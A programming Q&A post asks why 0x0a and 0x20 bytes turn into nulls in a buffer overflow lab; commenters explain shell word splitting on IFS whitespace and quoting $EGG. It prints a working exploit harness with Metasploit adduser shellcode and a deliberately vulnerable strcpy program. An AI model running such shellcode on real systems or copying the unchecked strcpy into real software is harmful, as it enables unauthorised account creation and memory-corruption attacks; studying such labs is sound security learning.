# Why are 0a bytes and 20 being converted into null bytes in my program?

Tags: c, null, stack, buffer-overflow

I am working with a set of c programs that I got from a buffer overflow demo. C program "A" sets an environment variable "EGG" and opens up a bash shell. Then from the bash shell opened by program "A", I run program "B" and provide the "EGG" variable as an argument. Program "B" is then supposed to simply copy the EGG variable into memory. Now the "EGG" variable created my program "A" is supposed to overlay everything from program "B"'s buffer through its return pointer, such that the return pointer now points back to the beginning of the value of "EGG" which is a command to create a shell or what have you.

In order to practice with this code, I used metasploit to generated the shell for the linux/x86/adduser payload, made sure to use the '-b "\x00"' option to remove any null bytes, and inserted the shell code into program "A". It did not work. After some debugging with gdb, I discovered that all instances of the \x0a and \x20 bytes in the shell code where being converted into null bytes when passed as an argument to program "B". I went back to metasploit and added \x0a and \x20 to the list of bytes to exclude, got my new payload, and everything worked perfectly.

My questions simply - why? Why would the \x20 and \x0a bytes turn into null bytes?

See code and screenshots from gdb below.

## Program "A"

```
#include<stdio.h>
#include<stdlib.h>
#include<string.h>

char shellcode[]=
"\xbe\x26\x4d\xed\x2e\xdb\xd9\xd9\x74\x24\xf4\x5f\x33\xc9\xb1"
"\x19\x83\xef\xfc\x31\x77\x0f\x03\x77\x29\xaf\x18\x1f\xfc\xa6"
"\x28\x0a\xb8\xe0\x63\x4b\x2e\x14\x24\x7d\x67\x47\xbc\x0e\x04"
"\x1f\x58\x99\xc5\xf0\xd0\x38\x71\x20\x74\xcf\xe2\xb7\x95\x6e"
"\x51\xc3\x94\xf1\x0a\x24\x0e\xf2\x2c\xb5\x22\x97\x58\xd4\xcf"
"\x27\xcc\x79\x59\xbc\x36\xc7\xe3\x13\x22\x8e\x60\x06\x9e\x60"
"\xb3\x9f\x8c\xe3\x81\x2f\x0a\xd4\xcf\x75\x45\x2e\x1f\xe8\xf0"
"\x20\x70\x9f\x6a\xb7\xd7\xd4\x3b\x3b\x8d\xee\xe3\x0e\xd2\x85"
"\x12\xc9\x1e\xd9";

char retaddr[] = "\xaa\xaa\xaa\xaa";

#define NOP 0x90


main()
{
    char buffer[176];

    memset(buffer, NOP, 176);

    memcpy(buffer, "EGG=", 4);

    memcpy(buffer+4, shellcode, 124);

    memcpy(buffer+168, retaddr, 4);
    memcpy(buffer+172, "\x00\x00\x00\x00",4);

    putenv(buffer);

    system("/bin/sh");

    return 0;
}
```

## Program "B"

```
#include<stdio.h>
#include<string.h>

main(int argc, char **argv)
{
    char buffer[160];

    strcpy(buffer, argv[1]);

    return 1;
}
```

### Screenshot of stack at the end of program "A" creating "EGG" variable (highlighted are is the shellcode, 0a and 20 bytes highlighed in red

[image: Screenshot of stack at the end of program "A" creating "EGG" variable (highlighted are is the shellcode, 0a and 20 bytes highlighed in red]

### Screenshot of "EGG" variable after being passed to program "B" (a0 and 20 bytes have are now null, highlighted in red)

[image: Screenshot of "EGG" variable after being passed to program "B" (a0 and 20 bytes have are now null, highlighted in red)]

Comment: One is an ascii space, the other an ascii newline. Might want to consider that in conjunction with how they're being used.

Comment: *“and provide the "EGG" variable as an argument”* How do you do that?

Comment: You probably need to quote the `$EGG` string for program B to avoid the shell splitting it into separate parameters: `./programB "$EGG"`.

Comment: @Ry program b is run with $EGG as an argument as in ./programB $EGG

Comment: @IanAbbott your idea works, thanks! However, I would still like to know why those specific bits get changed when I run it without quoting $EGG.

Comment: Like Ian Abbott said, you need to quote that. `$EGG` will be split on whitespace into multiple arguments otherwise. (sh is a pretty bad language.)

Comment: I see, I guess that's what @WhozCraig was alluding to as well. Thanks, everyone!

Comment: Look up "word splitting" in the shell manual. That occurs after `$` expansion. Word splitting occurs at characters specified by the `IFS` variable, which by default contains the whitespace characters SPACE, TAB, and NEWLINE (ASCII SP, HT, LF; character codes 0x20, 0x09, 0x0a).